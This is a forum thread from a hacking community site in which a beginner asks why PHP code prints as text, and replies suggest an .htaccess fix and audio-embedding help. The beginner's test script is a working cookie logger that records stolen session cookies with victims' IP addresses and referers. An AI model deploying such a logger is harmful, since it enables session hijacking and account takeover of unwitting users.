Follow us on Twitter!
You cannot teach a man anything; you can only help him find it within himself. - Galileo
Thursday, April 17, 2014
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 14
Guests Online: 13
Members Online: 1

Registered Members: 82815
Newest Member: medjiking
Latest Articles
View Thread

HellBound Hackers | Computer General | Webmasters Lounge

Author

php just displaying


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 11-08-07 11:04
I tried my first crack at php, on a php server, and what I did all failed. I tried using something from here to test it out, so I used one of the cookie loggers one of you all had written,
Code
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date = date ("F j, Y, g:i a",mktime(date("g")+7));
$referer = getenv ('HTTP_REFERER');
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: <b>'.$cookie.'</b><br> IP: <b>'.$ip.'</b><br> Date and Time: <b>'.$date.' EST</b><br> Referer: <b>'.$referer.'</b><br><br><br>');
fclose($fp);
?>



what was displayed was
'.$cookie.'
IP: '.$ip.'
Date and Time: '.$date.' EST
Referer: '.$referer.'


'); fclose($fp); ?>

I also tried
Code
<title><?php print (date()); ?></title>



for the title, and got that displayed as the title. I'm just learning from a downloaded e-book, at it might be outdated. It said that it would be ok to enclose things in just <? ?> but I didn't becasue I'd picked some up before hand and had never seen that done. Also, I installed xoops, which is a php based site manager, and it runs absolutely fine. What am I doing wrong?

Also, unrelated, how do you recomend embedding audio? I heard that the good, accepted way was to use

Code
<object classid="clsid:bf25d5-8c17-4b23-bc80-d3488abddc6d" codebase="http://www.apple.com/qtactvex/qtplugin.cab" width="49" hight="16">
   <param name="src" value="foo.mp3" />
   <param name="controller" value="true" />
   <param name="autoplay" value="false" />



but that isn't working either.
Author

RE: php just displaying

Uber0n
Member



Posts: 1963
Location: Sweden‭‮
Joined: 13.06.06
Rank:
Hacker Level 3
Posted on 11-08-07 11:12
I just googled for 'mp3 in website', this is the first result and it might answer your second question Wink


img230.imageshack.us/img230/724/uber0nsig3hj6.gif
http://uber0n.web. . .
Nope http://uber0n.webs.com/
Author

RE: php just displaying


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 11-08-07 22:51
1. new text file
2. copy and paste:
AddType application/x-httpd-php php
3. save as:
.htaccess
with the dot in front
4. upload to the directory your php script is in
5. make sure your file ends in .php (index.php)